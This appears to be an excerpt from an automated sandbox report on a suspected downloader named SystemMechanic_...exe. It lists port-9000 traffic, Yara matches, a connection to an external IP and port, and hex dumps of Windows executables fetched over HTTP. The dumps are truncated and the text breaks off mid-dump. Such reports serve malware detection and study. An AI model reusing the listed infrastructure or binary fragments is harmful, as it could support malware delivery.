Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49864

Yara detected Generic Downloader

Source: Yara match	File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic

TCP traffic: 192.168.2.4:49755 -> 91.215.85.66:15647

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 22:46:02 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 26 Apr 2024 22:45:02 GMTETag: "48000-61707a77a069a"Accept-Ranges: bytesContent-Length: 294912Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f 14 d4 08 4b 75 ba 5b 4b 75 ba 5b 4b 75 ba 5b 46 27 65 5b 55 75 ba 5b 46 27 5a 5b c3 75 ba 5b 46 27 5b 5b 64 75 ba 5b 42 0d 29 5b 48 75 ba 5b 4b 75 bb 5b 3b 75 ba 5b fe eb 5f 5b 4a 75 ba 5b 46 27 61 5b 4a 75 ba 5b fe eb 64 5b 4a 75 ba 5b 52 69 63 68 4b 75 ba 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b8 d4 c7 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0c 00 00 1a 01 00 00 3c c2 03 00 00 00 00 e7 40 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 c3 03 00 04 00 00 ec 72 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 94 01 00 28 00 00 00 00 f0 c1 03 e8 69 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 c3 03 4c 14 00 00 00 32 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 89 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a3 18 01 00 00 10 00 00 00 1a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 6d 00 00 00 30 01 00 00 6e 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 4d c0 03 00 a0 01 00 00 74 01 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 69 01 00 00 f0 c1 03 00 6a 01 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 4c 14 00 00 00 60 c3 03 00 16 00 00 00 6a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:08 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 22:46:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Fri, 15 Mar 2024 11:59:56 GMTETag: "4a4030-613b1bf118700"Accept-Ranges: bytesContent-Length: 4866096Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0a 00 84 e1 90 58 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 c4 35 00 00 50 14 00 00 00 00 00 60 d5 35 00 00 10 00 00 00 e0 35 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 60 c3 4a 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 37 00 9c 4e 00 00 00 d0 3c 00 eb fe 0d 00 00 00 00 00 00 00 00 00 00 18 4a 00 30 28 00 00 00 30 38 00 84 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 38 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 be 37 00 e0 0b 00 00 00 00 38 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 85 35 00 00 10 00 00 00 86 35 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:19 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:24 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:29 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 22:46:34 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 